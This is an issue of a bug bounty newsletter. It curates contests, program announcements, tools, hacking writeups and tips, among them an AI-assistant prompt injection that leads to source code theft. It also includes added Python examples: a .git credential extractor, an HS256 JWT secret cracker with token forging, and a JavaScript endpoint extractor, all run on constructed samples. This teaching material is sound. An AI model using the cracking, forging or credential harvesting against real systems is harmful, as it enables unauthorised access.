Disclosed. June 1, 2025: Disclosed. Launch, DistrictCon Junkyard Contest, Evan Connelly’s HackerOne Reflections, and more.
The bug bounty world, curated.

Welcome to Disclosed.
Hi there! The vast majority of you are brand new and this is my first post in your inbox. Words can’t communicate how grateful I am that you are taking the time out of your day to review my work. Please let me know if you have any feedback or if there are specific topics and items you’d like to see.
Lots of cool stuff to talk about this week, so let’s just dive in.

Junkyard Contest Offers Prizes for Vulnerability Research [🔗 Tweet]
by @DistrictCon
The Junkyard contest is live on Bugcrowd, offering prizes ranging from $100 to $5,000 in various categories to engage vulnerability researchers while promoting responsible disclosure.
Read the full tweet →
🚨 CALLING ALL VULNERABILITY RESEARCHERS 🚨
The Junkyard is officially open!
Prizes range from $100 to $5,000 for categories like:
☄️ Most Impactful System
👾 Best Meme Target
👏 Most Engaging Presentation
Submit via our Bugcrowd program to demonstrate real technical skill,
— DistrictCon (@DistrictCon)
2:14 PM • May 28, 2025
Launch of Curated Bug Bounty Newsletter 'Disclosed.' [🔗 Tweet]
by @infinitelogins
This tweet announces the public launch of 'Disclosed.', a newsletter tailored for the bug bounty community, focusing on programs, events, and educational resources.
Read the full tweet →
I've been working on something behind the scenes for the past couple of months, and I'm finally ready to share it.
Disclosed. A curated newsletter about the bug bounty world.
Over the last four weeks, I've been quietly publishing weekly issues and
— Harley Kimball (@infinitelogins)
1:10 AM • May 30, 2025
Launch of “Disclosed. Online”. [🔗 Tweet]
by @infinitelogins
This tweet introduces a new automation project designed to aggregate bug bounty profiles.
Read the full tweet →
Built some automation and a directory for aggregating bug bounty profiles. Adding your profile isn't open to the public yet but let me know what you think.
disclosedonline.com/directory#bugbounty
— Harley Kimball (@infinitelogins)
3:43 AM • May 27, 2025
What I Learned From My First 100 HackerOne Reports [🔗 Blog]
by Evan Connelly
Evan Connelly reflects on lessons learned from his first 100 HackerOne reports, offering insights into hacker mindset, report quality, and evolving tooling preferences.
Read the full blog →
Have something you want to Spotlight? Tell me.

Meta Invites Researchers for Exclusive Quest Device Bug Bounty [🔗 Tweet]
by @metabugbounty
Meta is launching an exclusive invite-only bug bounty program for Quest devices, focusing on RCE and EOP vulnerabilities, seeking experienced researchers with added incentives to participate.
Read the full tweet →
We're piloting a new invite-only bug bounty for Quest devices and seeking 1-3 experienced researchers (AOSP experience a plus) for a 6-month participation. The scope will focus on RCE/EOP vulns & exploits.
There will be special incentives on top of the regular bounty payouts,
— Meta Bug Bounty (@metabugbounty)
5:01 PM • May 28, 2025
Recon Village at DEF CON 33 CFP Deadline is June 15 [🔗 Tweet]
by @ReconVillage
An invitation to submit talks for the Recon Village at DEF CON 33, with a submission deadline of June 15.
Read the full tweet →
UK HackerOne Club Hacking Meetup Scheduled for June! [🔗 Tweet]
by @njcve_
An invitation to a HackerOne Club hacking meetup in London this June, encouraging attendees to spread the word.
Read the full tweet →
Zoom Reports Major Bug Bounty Program Success and Improvements [🔗 Tweet]
by @Hacker0x01
Zoom outlines significant improvements in its bug bounty program, featuring doubled participation, key vulnerability fixes, and reduced remediation times, showcasing the program’s effectiveness.
Read the full tweet →
Did I miss an important update? Tell me.

SQLi Pentest Toolkit. Unleash your inner hacker — the SQLi… [📓 Blog]
by adce626
This post introduces the SQLi Pentest Toolkit, a web resource for penetration testers focused on SQL Injection vulnerabilities. It covers essential features like a user-friendly UI, diverse SQLi payloads, time-based testing commands, and a section for Google Dorks. The toolkit integrates LOXS for time-based SQLi detection and includes educational videos to enhance learning.
Read more →

New Resource for Caido Plugins Streamlines Setup [🔗 Tool]
by @amrelsagaei
The launch of CaidoPlugins.com offers a centralized resource for Caido-related plugins, including listings and installation guides to save users time.
Read the full tweet →

Open-Source Web App for Bug Bounty Tracking [🔗 Tool]
by @sirmatrixpage
A new open-source web app for bug bounty hunters allows users to track vulnerabilities, save tips, and receive updates through RSS feeds.
Read the full tweet →

BountyOS - Bug Bounty Linux OS [📓 Tool]
by Sirat Sami (analyz3r)
BountyOS is a Debian 12-based Linux distribution specifically crafted for bug bounty professionals and web app security researchers. It offers over 75 essential tools in categories like reconnaissance and testing, easily accessible in live mode. Regular updates and exclusive tools not found elsewhere aim to create a streamlined environment for security researchers.
Read more →
Active Scan++ Enhances OS Command Injection Checks [🔗 Tool]
by @d4d89704243
Active Scan++ has introduced new checks for OS command injection based on recent research, and it is now available through the BApp Store.
Read the full tweet →
Have a favorite tool? Tell me.

Remote Prompt Injection in GitLab Duo Leads to Source Code Theft
📝 Writeup by Omer Mayraz
Omer Mayraz describes a remote prompt injection in GitLab Duo, GitLab's AI assistant: attacker-controlled content that the assistant processes is interpreted as instructions, and the writeup shows how that can be turned into theft of private source code.
Read more →

How I was able to Delete Any User Post On Tumblr
📝 Writeup by 0xshehab
This writeup details a vulnerability in Tumblr that let an attacker delete any user's post with no user interaction. The exploit chains insecure HTTP method handling with misuse of the embed_url feature for audio posts.
Read more →
Did I miss an important update? Tell me.

My Bug Bounty Automation Update! [🎥 Video]
by G0LDEN_infosec
This video provides a brief overview of g0lden’s current bug bounty automation setup, highlighting recent changes.
Watch video →
Balancing Bug Bounty Freedom with Hacking Time (Ep. 124) [🎥 Video]
by Critical Thinking - Bug Bounty Podcast
In Episode 124, Justin and Joseph discuss news from the community, offering insights on managing hacking time effectively.
Watch video →
Vibe Coding in Cursor for Cyber Security [🔗 Video]
by @InsiderPhD
This video introduces 'vibe coding' with AI to create custom recon tools but lacks depth in actionable content.
Watch the video →
Advanced GitHub Recon & .git Exposer [🔗 Video]
by @coffinxp7
A live reconnaissance session against a NASA subdomain that turns up sensitive database credentials, demonstrating how to hunt exposed .git directories at scale.
Watch the video →
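Hunting exposed .git directories comes down to two checks once a request to /.git/HEAD returns something: is the body really a git HEAD file (many servers answer HTTP 200 with an HTML "not found" page), and, if the repository can be recovered, does .git/config carry credentials in a remote URL. The following Python is an added example and is not code from the video or its author; it works on already-fetched text only (no network I/O), and the HEAD bodies and the config file below are constructed samples with a hypothetical host and credentials.

```python
from __future__ import annotations

import re
from urllib.parse import urlsplit

# A real .git/HEAD is either a symbolic ref or a bare commit id (40 hex chars for
# SHA-1 repositories, 64 for SHA-256 ones). Anything else served under /.git/HEAD,
# such as an HTML "not found" page returned with HTTP 200, is a soft 404.
HEAD_RE = re.compile(r"^(?:ref: refs/\S+|[0-9a-f]{40}|[0-9a-f]{64})$")


def looks_like_git_head(body: str) -> bool:
    """True if the text fetched from /.git/HEAD is a genuine HEAD file."""
    return HEAD_RE.match(body.strip()) is not None


def parse_git_config(text: str) -> dict[str, dict[str, str]]:
    """Minimal parser for git's INI-style config: {"remote.origin": {"url": ...}, ...}."""
    sections: dict[str, dict[str, str]] = {}
    current: str | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        header = re.match(r'^\[([^\s"\]]+)(?:\s+"([^"]*)")?\]$', line)
        if header:
            current = header.group(1)
            if header.group(2) is not None:          # [remote "origin"] -> remote.origin
                current += "." + header.group(2)
            sections.setdefault(current, {})
            continue
        if current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip()] = value.strip()
    return sections


def find_remote_credentials(config: dict[str, dict[str, str]]) -> list[dict[str, str]]:
    """Report remotes whose URL embeds userinfo (user or user:password)."""
    hits = []
    for name, entries in config.items():
        if not name.startswith("remote."):
            continue
        parts = urlsplit(entries.get("url", ""))   # scp-style git@host:path has no scheme, so no userinfo
        if parts.username:
            hits.append({
                "remote": name,
                "host": parts.hostname or "",
                "username": parts.username,
                "password": parts.password or "",
            })
    return hits


# Constructed sample responses and config (hypothetical host and credentials).
HEAD_REAL = "ref: refs/heads/main\n"
HEAD_SOFT404 = "<html><body><h1>Page not found</h1></body></html>"
CONFIG_SAMPLE = """\
[core]
\trepositoryformatversion = 0
\tfilemode = true
[remote "origin"]
\turl = https://deploy:Pa55w0rd@git.example.com/acme/app.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[remote "mirror"]
\turl = git@github.com:acme/app.git
"""

if __name__ == "__main__":
    print("real HEAD:", looks_like_git_head(HEAD_REAL))
    print("soft 404:", looks_like_git_head(HEAD_SOFT404))
    for hit in find_remote_credentials(parse_git_config(CONFIG_SAMPLE)):
        print(f"{hit['remote']}: {hit['username']}:{'*' * len(hit['password'])}@{hit['host']}")
```

The HEAD check is what keeps a mass scan honest: filtering on the file's actual grammar rather than on status code is what separates a finding from a pile of soft-404 false positives. Credentials in a remote URL are only one place they hide in a dumped repository; the same parsing approach extends to .git/logs and to the checked-out files once the objects are recovered.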
This Sneaky Malware Uses Cloudflare to Steal Your Password [🔗 Video]
by Ben Sadeghipour (Nahamsec)
This video shows how a simple right-click file deletion can trigger malware deployment, showcasing a technique by @I_Am_Jakoby.
Watch the video →
RCE via deserialization with a class allowlist bypass and DNS exfiltration with Arthur Aires [🔗 Video]
by Bug Bounty Reports Explained
This video demonstrates real-world deserialization RCE exploits, focusing on techniques for bypassing a class allowlist and data exfiltration via DNS.
Watch the video →
Did I miss something? Tell me.

Recon series #5: A hacker’s guide to Google dorking – YesWeHack [📓 Blog]
by YesWeHack
This comprehensive guide to Google dorking illustrates its importance for bug bounty hunters, detailing key search operators that aid effective reconnaissance. It includes practical illustrations for uncovering subdomains, hidden files, and login portals, emphasizing passive reconnaissance methods.
Read more →

Cracking JWTs: A Bug Bounty Hunting Guide — Part 2 [📓 Blog]
by Aditya Bhatt
This article explores exploitation techniques related to JSON Web Tokens (JWTs), focusing on weak signing keys to bypass authentication controls. It includes a hands-on lab walkthrough, using tools like Burp Suite and Hashcat to crack JWTs. The post emphasizes the significance of strong cryptographic practices in security assessments.
Read more →
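The attack the article walks through with Burp Suite and Hashcat is an offline dictionary attack on an HS256 signature: recompute HMAC-SHA256 over the token's header.payload for each candidate secret and compare with the signature, then re-sign a modified payload with the recovered key. The Python below is an added example, not code from the article or its lab, and uses only the standard library; the weak secret "secret123", the five-word wordlist and the claims are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Iterable, Optional


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(data: str) -> bytes:
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Build header.payload.signature with HMAC-SHA256 (RFC 7519 / RFC 7518)."""
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Return the claims if the signature checks out under HS256, else None."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":   # never let the token choose the algorithm ("none", key confusion)
        return None
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


def crack_hs256(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute the MAC per candidate and compare."""
    signing_input, sig_b64 = token.rsplit(".", 1)
    target = b64url_decode(sig_b64)
    for candidate in wordlist:
        mac = hmac.new(candidate.encode(), signing_input.encode("ascii"), hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return candidate
    return None


def forge(token: str, secret: str, **claim_changes) -> str:
    """Re-sign the token with the recovered secret after changing claims."""
    header_b64, payload_b64, _ = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    payload.update(claim_changes)
    return sign_hs256(header, payload, secret.encode())


# Constructed demo material: a hypothetical app signing with a guessable secret.
WEAK_SECRET = "secret123"
WORDLIST = ["password", "123456", "jwt_secret", "secret123", "changeme"]
WEAK_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"sub": "1001", "role": "user"}, WEAK_SECRET.encode())
# RFC 7518 section 3.2 requires an HS256 key of at least 256 bits; a random key
# of that size is out of reach for any wordlist or brute-force run.
STRONG_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"sub": "1001", "role": "user"}, secrets.token_bytes(32))

if __name__ == "__main__":
    found = crack_hs256(WEAK_TOKEN, WORDLIST)
    print("recovered secret:", found)
    print("forged admin claims:", verify_hs256(forge(WEAK_TOKEN, found, role="admin"), found.encode()))
    print("strong token cracked:", crack_hs256(STRONG_TOKEN, WORDLIST))
```

At scale the same computation is hashcat mode 16500 fed the whole token; the Python loop is here to make the mechanics visible. On the defensive side the two things the verifier does matter as much as key length: it pins the algorithm rather than reading it from the header, and it compares in constant time.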
Essential API Hacking Tips for Bug Bounty Success [🔗 Tweet]
by @intigriti
This tweet shares twelve valuable tips for hacking APIs that bug bounty hunters can apply in their research.
Read the full tweet →
Did I miss something? Tell me.

Real-Time RCE via Less Secure Staging Endpoint [🔗 Tweet]
by Matt Greer (VailSec)
The researcher found an employee subdomain with a PDF upload endpoint blocked by the WAF, then a staging subdomain exposing the same endpoint behind a laxer WAF. Because staging uploads were mirrored to production in real time, the weaker staging control yielded unauthenticated remote code execution on both environments.
Read the full tweet →
Found an employee subdomain with a PDF upload endpoint blocked by WAF. Discovered a staging subdomain with the same endpoint but the WAF wasn't as strict. Noticed uploads mirrored to prod in real time. Got unauthenticated RCE on both staging and prod.
#bugbountytips #BugBounty
— Matt Greer (@VailSec)
3:21 PM • May 27, 2025
Top 5 Insecure Coding Patterns to Identify Bugs [🔗 Thread]
by André Baptista (0xacb)
This tweet outlines five insecure coding patterns that can help researchers spot overlooked bugs during assessments.
Read the full thread →
Looking out for these insecure coding patterns can help you spot bugs others miss.
Here are 5 insecure coding patterns to look for 👇
— André Baptista (@0xacb)
11:15 AM • May 30, 2025
New XSS Vector Found Exclusively in Safari [🔗 Tweet]
by Gareth Heyes
This tweet highlights a new XSS vector found in Safari, challenging others to identify it without accessing the shared link.
Read the full tweet →
My new favourite XSS vector only on beloved Safari. Can you work it out without looking at the link?
portswigger-labs.net/xss/xss.php?x=…
— Gareth Heyes (@garethheyes)
11:37 AM • May 28, 2025
Understanding Prompt Injection and Its Security Implications [🔗 Tweet]
by rez0
rez0 argues that most prompt injection issues today are ordinary application security logic flaws, which matters because it is tempting to reach for model-level fixes (alignment, ML guardrails) first; he expects that to change as AI systems become more autonomous.
Read the full tweet →
"Most prompt injection issues are currently basic application security logic issues. This won’t always be the case as AI systems become more autonomous, but is now; and this matters because it’s easy to go to new solutions (model alignment, ML guardrails) when prompt injection is
— rez0 (@rez0__)
1:11 PM • May 30, 2025
Broadening Recon Techniques Beyond Enumeration and Fuzzing [🔗 Tweet]
by RogueSMG
This tweet emphasizes advanced reconnaissance techniques, such as analyzing JavaScript for hidden parameters and reverse-engineering mobile apps.
Read the full tweet →
Recon isn't just Sub enum and dir fuzzing. Go deeper:
- Analyzing JS for hidden endpoints/params.
- Rev-engineering mobile apps - even for just endpoints
- Understanding how different microservices talk to each other.
- Finding old, forgotten dev/staging instances.
Welcome #AI,
— RogueSMG (@RogueSMG)
12:19 PM • May 26, 2025
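The first item in that list, pulling hidden endpoints and parameters out of JavaScript, is the one most easily turned into a repeatable check. The Python below is an added example and is not a tool from RogueSMG or anyone mentioned on this page: it runs a handful of regexes over a bundle and returns candidate paths, absolute URLs and parameter names, including names that only appear in searchParams calls or JSON request bodies. The bundle it scans is a constructed sample with hypothetical endpoints, and the patterns are a starting point rather than a parser for every way a frontend can build a request.

```python
import re

# Quoted or template-literal paths, optionally prefixed by a `${BASE}` variable,
# captured up to the first character that cannot be part of a path.
PATH_RE = re.compile(r"""["'`](?:\$\{\w+\})?(/[A-Za-z0-9_\-./]*(?:\$\{\w+\}[A-Za-z0-9_\-./]*)*)""")
URL_RE = re.compile(r"""https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s"'`]*)?""")
QUERY_PARAM_RE = re.compile(r"[?&]([A-Za-z_]\w*)=")
SEARCHPARAMS_RE = re.compile(r"""searchParams\.(?:set|append)\(\s*["']([A-Za-z_]\w*)["']""")
JSON_BODY_RE = re.compile(r"JSON\.stringify\(\s*\{([^}]*)\}")
IDENT_RE = re.compile(r"^[A-Za-z_]\w*$")

# Static assets are noise for endpoint discovery.
STATIC_SUFFIXES = (".js", ".css", ".map", ".png", ".jpg", ".jpeg", ".gif", ".svg", ".ico", ".woff", ".woff2")


def extract_endpoints(js: str) -> list[str]:
    """Candidate API paths and absolute URLs referenced by the bundle."""
    found = set()
    for m in PATH_RE.finditer(js):
        path = m.group(1)
        if path == "/" or path.startswith("//") or path.lower().endswith(STATIC_SUFFIXES):
            continue
        found.add(path)
    for m in URL_RE.finditer(js):
        found.add(m.group(0))
    return sorted(found)


def extract_params(js: str) -> list[str]:
    """Parameter names from query strings, URLSearchParams calls and JSON bodies."""
    found = set(QUERY_PARAM_RE.findall(js))
    found.update(SEARCHPARAMS_RE.findall(js))
    for body in JSON_BODY_RE.findall(js):
        for item in body.split(","):
            key = item.split(":", 1)[0].strip()   # handles both `key: value` and shorthand `{ key }`
            if IDENT_RE.match(key):
                found.add(key)
    return sorted(found)


# Constructed sample bundle (hypothetical API and endpoints).
SAMPLE_JS = r"""
const API = "https://api.example.com";
async function loadUser(id) {
  const r = await fetch(`${API}/v2/users/${id}?include=roles&debug=1`);
  return r.json();
}
function exportReport(q) {
  const u = new URL("/internal/reports/export", location.origin);
  u.searchParams.set("format", q.format);
  u.searchParams.append("admin_view", "true");
  return fetch(u, { method: "POST", body: JSON.stringify({ reportId: q.id, includeDeleted: false }) });
}
const logo = "/static/img/logo.svg";
"""

if __name__ == "__main__":
    print("endpoints:", extract_endpoints(SAMPLE_JS))
    print("params:", extract_params(SAMPLE_JS))
```

Run this over every script a target serves and diff the output against what the app sends during normal use: parameters such as debug or admin_view that the frontend knows about but never sets in a normal session, and paths under /internal that no page links to, are exactly the "hidden" surface the tweet is pointing at.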
Did I miss something? Tell me.
Did you like this week's drop? Please share feedback.
Because Disclosure Matters: This newsletter was produced with the assistance of AI. While I strive for accuracy and quality, not all content has been independently vetted or fact-checked. Please allow for a reasonable margin of error. The views expressed are my own and do not reflect those of my employer.